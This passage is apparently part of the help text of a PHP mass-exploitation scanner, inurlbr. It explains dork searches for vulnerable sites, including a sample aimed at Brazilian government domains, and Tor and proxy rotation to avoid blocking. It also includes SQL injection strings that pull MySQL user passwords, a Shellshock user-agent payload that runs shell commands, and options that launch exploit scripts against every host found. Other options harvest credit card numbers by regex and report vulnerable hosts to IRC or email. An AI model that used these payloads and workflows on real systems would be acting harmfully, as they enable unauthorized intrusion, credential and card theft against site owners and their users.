- {$_SESSION["c1"]}21{$_SESSION["c0"]} - {$_SESSION["c2"]}SOGOU
- {$_SESSION["c1"]}22{$_SESSION["c0"]} - {$_SESSION["c2"]}DUCK DUCK GO
- {$_SESSION["c1"]}23{$_SESSION["c0"]} - {$_SESSION["c2"]}BOOROW
- {$_SESSION["c1"]}24{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE(CSE) GENERIC RANDOM
- ----------------------------------------
- SPECIAL MOTORS
- ----------------------------------------
- {$_SESSION["c1"]}e1{$_SESSION["c0"]} - {$_SESSION["c2"]}TOR FIND
- {$_SESSION["c1"]}e2{$_SESSION["c0"]} - {$_SESSION["c2"]}ELEPHANT
- {$_SESSION["c1"]}e3{$_SESSION["c0"]} - {$_SESSION["c2"]}TORSEARCH
- {$_SESSION["c1"]}e4{$_SESSION["c0"]} - {$_SESSION["c2"]}WIKILEAKS
- {$_SESSION["c1"]}e5{$_SESSION["c0"]} - {$_SESSION["c2"]}OTN
- {$_SESSION["c1"]}e6{$_SESSION["c0"]} - {$_SESSION["c2"]}EXPLOITS SHODAN
- ----------------------------------------
- {$_SESSION["c1"]}all{$_SESSION["c0"]} - {$_SESSION["c2"]}All search engines / not special motors{$_SESSION["c0"]}
- Default: {$_SESSION["c1"]}1{$_SESSION["c0"]}
- Example: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1{$_SESSION["c0"]}
- {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}5{$_SESSION["c0"]}
- Using more than one engine: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1,2,5,6,11,24{$_SESSION["c0"]}
- Using all engines: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}all{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--proxy{$_SESSION["c0"]} Choose which proxy you want to use through the search engine:
- Example: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}{proxy:port}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}localhost:8118{$_SESSION["c0"]}
- {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}socks5://googleinurl@localhost:9050{$_SESSION["c0"]}
- {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}http://admin:12334@172.16.0.90:8080{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--proxy-file{$_SESSION["c0"]} Set font file to randomize your proxy to each search engine.
- Example: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}{proxys}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}proxys_list.txt{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--time-proxy{$_SESSION["c0"]} Set the time how often the proxy will be exchanged.
- Example: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}10{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--proxy-http-file{$_SESSION["c0"]} Set file with urls http proxy,
- are used to bular capch search engines
- Example: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}{youfilehttp}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}http_proxys.txt{$_SESSION["c0"]}
-
-
- {$_SESSION["c1"]}--tor-random{$_SESSION["c0"]} Enables the TOR function, each usage links an unique IP.
-
- {$_SESSION["c1"]}-t{$_SESSION["c0"]} Choose the validation type: op {$_SESSION["c2"]}1, 2, 3, 4, 5{$_SESSION["c0"]}
- [options]:
- {$_SESSION["c2"]}1{$_SESSION["c0"]} - The first type uses default errors considering the script:
- It establishes connection with the exploit through the get method.
- Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
-
- {$_SESSION["c2"]}2{$_SESSION["c0"]} - The second type tries to valid the error defined by: {$_SESSION["c1"]}-a={$_SESSION["c2"]}'VALUE_INSIDE_THE _TARGET'{$_SESSION["c0"]}
- It also establishes connection with the exploit through the get method
- Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
-
- {$_SESSION["c2"]}3{$_SESSION["c0"]} - The third type combine both first and second types:
- Then, of course, it also establishes connection with the exploit through the get method
- Demo: www.target.com.br{$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
- Default: {$_SESSION["c2"]}1{$_SESSION["c0"]}
- Example: {$_SESSION["c1"]}-t {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-t {$_SESSION["c2"]}1{$_SESSION["c0"]}
-
- {$_SESSION["c2"]}4{$_SESSION["c0"]} - The fourth type a validation based on source file and will be enabled scanner standard functions.
- The source file their values are concatenated with target url.
- - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
- - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
- Explicative:
- Source file values:
- /admin/index.php?id=
- /pag/index.php?id=
- /brazil.php?new=
- Demo:
- www.target.com.br/admin/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
- www.target.com.br/pag/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
- www.target.com.br/brazil.php?new={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
-
- {$_SESSION["c2"]}5{$_SESSION["c0"]} - (FIND PAGE) The fifth type of validation based on the source file,
- Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
- - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
- - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
- Explicative:
- Source file values:
- /admin/admin.php
- /admin.asp
- /admin.aspx
- Demo:
- www.target.com.br/admin/admin.php
- www.target.com.br/admin.asp
- www.target.com.br/admin.aspx
- Observation: If it shows the code 200 will be separated in the output file
-
- DEFAULT ERRORS:
- {$_SESSION["c11"]}
- [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
- [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
- [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
- [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
- [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
- [*]ERROR INDEFINITE
- {$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--dork{$_SESSION["c0"]} Defines which dork the search engine will use.
- Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{dork}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br inurl:php? id'{$_SESSION["c0"]}
- - Using multiples dorks:
- Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{[DORK]dork1[DORK]dork2[DORK]dork3}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--dork-file{$_SESSION["c0"]} Set font file with your search dorks.
- Example: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}{dork_file}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks.txt'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--exploit-get{$_SESSION["c0"]} Defines which exploit will be injected through the GET method to each URL found.
- Example: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}{exploit_get}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?'´%270x27;\"{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--exploit-post{$_SESSION["c0"]} Defines which exploit will be injected through the POST method to each URL found.
- Example: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}{exploit_post}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]} Defines which exploit/parameter will be executed in the options: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all{$_SESSION["c0"]}.
- The exploit-command will be identified by the paramaters: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
- Ex {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf' {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'curl -v {$_SESSION["c8"]}_TARGET_{$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c2"]}'{$_SESSION["c0"]}
- _TARGET_ is the specified URL/TARGET obtained by the process
- _EXPLOIT_ is the exploit/parameter defined by the option {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
- Example: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}{exploit-command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}-a{$_SESSION["c0"]} Specify the string that will be used on the search script:
- Example: {$_SESSION["c1"]}-a {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-a {$_SESSION["c2"]}'hello world'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}-d{$_SESSION["c0"]} Specify the script usage op {$_SESSION["c2"]}1, 2, 3, 4, 5.{$_SESSION["c0"]}
- Example: {$_SESSION["c1"]}-d {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-d {$_SESSION["c2"]}1 {$_SESSION["c0"]}/URL of the search engine.
- {$_SESSION["c1"]}-d {$_SESSION["c2"]}2 {$_SESSION["c0"]}/Show all the url.
- {$_SESSION["c1"]}-d {$_SESSION["c2"]}3 {$_SESSION["c0"]}/Detailed request of every URL.
- {$_SESSION["c1"]}-d {$_SESSION["c2"]}4 {$_SESSION["c0"]}/Shows the HTML of every URL.
- {$_SESSION["c1"]}-d {$_SESSION["c2"]}5 {$_SESSION["c0"]}/Detailed request of all URLs.
- {$_SESSION["c1"]}-d {$_SESSION["c2"]}6 {$_SESSION["c0"]}/Detailed PING - PONG irc.
-
- {$_SESSION["c1"]}-s{$_SESSION["c0"]} Specify the output file where it will be saved the vulnerable URLs.
-
- Example: {$_SESSION["c1"]}-s {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-s {$_SESSION["c2"]}your_file.txt
-
- {$_SESSION["c1"]}-o{$_SESSION["c0"]} Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
- Example: {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file_where_my_urls_are}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}-o {$_SESSION["c2"]}tests.txt
-
- {$_SESSION["c1"]}--persist{$_SESSION["c0"]} Attempts when Google blocks your search.
- The script tries to another google host / default = 4
- Example: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}{number_attempts}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}7
-
- {$_SESSION["c1"]}--ifredirect{$_SESSION["c0"]} Return validation method post REDIRECT_URL
- Example: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}{string_validation}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}'/admin/painel.php'
-
- {$_SESSION["c1"]}-m{$_SESSION["c0"]} Enable the search for emails on the urls specified.
-
- {$_SESSION["c1"]}-u{$_SESSION["c0"]} Enables the search for URL lists on the url specified.
-
- {$_SESSION["c1"]}--gc{$_SESSION["c0"]} Enable validation of values with google webcache.
-
- {$_SESSION["c1"]}--pr{$_SESSION["c0"]} Progressive scan, used to set operators (dorks),
- makes the search of a dork and valid results, then goes a dork at a time.
-
- {$_SESSION["c1"]}--file-cookie{$_SESSION["c0"]} Open cookie file.
-
- {$_SESSION["c1"]}--save-as{$_SESSION["c0"]} Save results in a certain place.
-
- {$_SESSION["c1"]}--shellshock{$_SESSION["c0"]} Explore shellshock vulnerability by setting a malicious user-agent.
-
- {$_SESSION["c1"]}--popup{$_SESSION["c0"]} Run --command all or vuln in a parallel terminal.
-
- {$_SESSION["c1"]}--cms-check{$_SESSION["c0"]} Enable simple check if the url / target is using CMS.
-
- {$_SESSION["c1"]}--no-banner{$_SESSION["c0"]} Remove the script presentation banner.
-
- {$_SESSION["c1"]}--unique{$_SESSION["c0"]} Filter results in unique domains.
-
- {$_SESSION["c1"]}--beep{$_SESSION["c0"]} Beep sound when a vulnerability is found.
-
- {$_SESSION["c1"]}--alexa-rank{$_SESSION["c0"]} Show alexa positioning in the results.
-
- {$_SESSION["c1"]}--robots{$_SESSION["c0"]} Show values file robots.
-
- {$_SESSION["c1"]}--range{$_SESSION["c0"]} Set range IP.
- Example: {$_SESSION["c1"]}--range {$_SESSION["c2"]}{range_start,rage_end}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--range {$_SESSION["c2"]}'172.16.0.5#172.16.0.255'
-
- {$_SESSION["c1"]}--range-rand{$_SESSION["c0"]} Set amount of random ips.
- Example: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}{rand}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}'50'
-
- {$_SESSION["c1"]}--irc{$_SESSION["c0"]} Sending vulnerable to IRC / server channel.
- Example: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}{server#channel}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil'
-
- {$_SESSION["c1"]}--http-header{$_SESSION["c0"]} Set HTTP header.
- Example: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm=\"Top Secret\"'
-
- {$_SESSION["c1"]}--sedmail{$_SESSION["c0"]} Sending vulnerable to email.
- Example: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}youemail@inurl.com.br
-
- {$_SESSION["c1"]}--delay{$_SESSION["c0"]} Delay between research processes.
- Example: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}10
-
- {$_SESSION["c1"]}--time-out{$_SESSION["c0"]} Timeout to exit the process.
- Example: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}10
-
- {$_SESSION["c1"]}--ifurl{$_SESSION["c0"]} Filter URLs based on their argument.
- Example: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}{ifurl}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}index.php?id=
-
- {$_SESSION["c1"]}--ifcode{$_SESSION["c0"]} Valid results based on your return http code.
- Example: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}{ifcode}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}200
-
- {$_SESSION["c1"]}--ifemail{$_SESSION["c0"]} Filter E-mails based on their argument.
- Example: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}{file_where_my_emails_are}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}sp.gov.br
-
- {$_SESSION["c1"]}--url-reference{$_SESSION["c0"]} Define referring URL in the request to send him against the target.
- Example: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}{url}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}http://target.com/admin/user/valid.php
-
- {$_SESSION["c1"]}--mp{$_SESSION["c0"]} Limits the number of pages in the search engines.
- Example: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}{limit}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}50
-
- {$_SESSION["c1"]}--user-agent{$_SESSION["c0"]} Define the user agent used in its request against the target.
- Example: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}{agent}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
- Usage-exploit / SHELLSHOCK:
- {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"'
- Complete command:
- php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
-
- {$_SESSION["c1"]}--sall{$_SESSION["c0"]} Saves all urls found by the scanner.
- Example: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}your_file.txt
-
- {$_SESSION["c1"]}--command-vul{$_SESSION["c0"]} Every vulnerable URL found will execute this command parameters.
- Example: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--command-all{$_SESSION["c0"]} Use this commmand to specify a single command to EVERY URL found.
- Example: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
- [!] Observation:
-
- {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} will be replaced by the URL/target found, although if the user
- doesn't input the get, only the domain will be executed.
-
- {$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c0"]} will be replaced by the original URL / target found.
-
- {$_SESSION["c14"]}_TARGETXPL_{$_SESSION["c0"]} will be replaced by the original URL / target found + EXPLOIT --exploit-get.
-
- {$_SESSION["c9"]}_TARGETIP_{$_SESSION["c0"]} return of ip URL / target found.
-
- {$_SESSION["c8"]}_URI_{$_SESSION["c0"]} Back URL set of folders / target found.
-
- {$_SESSION["c15"]}_RANDOM_{$_SESSION["c0"]} Random strings.
-
- {$_SESSION["c9"]}_PORT_{$_SESSION["c0"]} Capture port of the current test, within the --port-scan process.
-
- {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]} will be replaced by the specified command argument {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
- The exploit-command will be identified by the parameters {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--replace{$_SESSION["c0"]} Replace values in the target URL.
- Example: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}{value_old[INURL]value_new}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.aspx?id=[INURL]index.aspx?id=1%27´'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--remove{$_SESSION["c0"]} Remove values in the target URL.
- Example: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}'/admin.php?id=0'
-
- {$_SESSION["c1"]}--regexp{$_SESSION["c0"]} Using regular expression to validate his research, the value of the
- Expression will be sought within the target/URL.
- Example: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
- All Major Credit Cards:
- Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'{$_SESSION["c0"]}
-
- IP Addresses:
- Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'{$_SESSION["c0"]}
-
- EMAIL:
- Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
-
-
- {$_SESSION["c1"]}---regexp-filter{$_SESSION["c0"]} Using regular expression to filter his research, the value of the
- Expression will be sought within the target/URL.
- Example: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
- EMAIL:
- Usage: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
-
-
- [!] Small commands manager:
-
- {$_SESSION["c1"]}--exploit-cad{$_SESSION["c0"]} Command register for use within the scanner.
- Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
- Example Format: NMAP::nmap -sV _TARGET_
- Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
- Usage: {$_SESSION["c1"]}--exploit-cad{$_SESSION["c2"]} 'NMAP::nmap -sV _TARGET_'{$_SESSION["c0"]}
- Observation: Each registered command is identified by an id of your array.
- Commands are logged in exploits.conf file.
-
- {$_SESSION["c1"]}--exploit-all-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
- (all) is run for each target found by the engine.
- Example: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}1,2,8,22
-
- {$_SESSION["c1"]}--exploit-vul-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
- (vull) run command only if the target was considered vulnerable.
- Example: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}1,2,8,22
-
- {$_SESSION["c1"]}--exploit-list{$_SESSION["c0"]} List all entries command in exploits.conf file.
-
-
- [!] Running subprocesses:
-
- {$_SESSION["c1"]}--sub-file{$_SESSION["c0"]} Subprocess performs an injection
- strings in URLs found by the engine, via GET or POST.
- Example: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}{youfile}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}exploits_get.txt
-
- {$_SESSION["c1"]}--sub-get{$_SESSION["c0"]} defines whether the strings coming from
- --sub-file will be injected via GET.
- Usage: {$_SESSION["c1"]}--sub-get
-
- {$_SESSION["c1"]}--sub-post{$_SESSION["c0"]} defines whether the strings coming from
- --sub-file will be injected via POST.
- Usage: {$_SESSION["c1"]}--sub-get
-
- {$_SESSION["c1"]}--sub-concat{$_SESSION["c0"]} Sets string to be concatenated with
- the target host within the subprocess
- Example: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}'/login.php'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--sub-cmd-vul{$_SESSION["c0"]} Each vulnerable URL found within the sub-process
- will execute the parameters of this command.
- Example: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--sub-cmd-all{$_SESSION["c0"]} Run command to each target found within the sub-process scope.
- Example: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
-
-
- {$_SESSION["c1"]}--port-scan{$_SESSION["c0"]} Defines ports that will be validated as open.
- Example: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}{ports}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}'22,21,23,3306'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--port-cmd{$_SESSION["c0"]} Define command that runs when finding an open door.
- Example: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_:_PORT_'{$_SESSION["c0"]}
- {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_/file.php?sqli=1'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}--port-write{$_SESSION["c0"]} Send values for door.
- Example: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}{'value0','value1','value3'}{$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}\"'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'\"{$_SESSION["c0"]}
-
-
-
- [!] Modifying values used within script parameters:
-
- {$_SESSION["c1"]}md5{$_SESSION["c0"]} Encrypt values in md5.
- Example: {$_SESSION["c1"]}md5({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}md5({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-get 'user?id=md5({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}base64{$_SESSION["c0"]} Encrypt values in base64.
- Example: {$_SESSION["c1"]}base64({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}base64({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-get 'user?id=base64({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}hex{$_SESSION["c0"]} Encrypt values in hex.
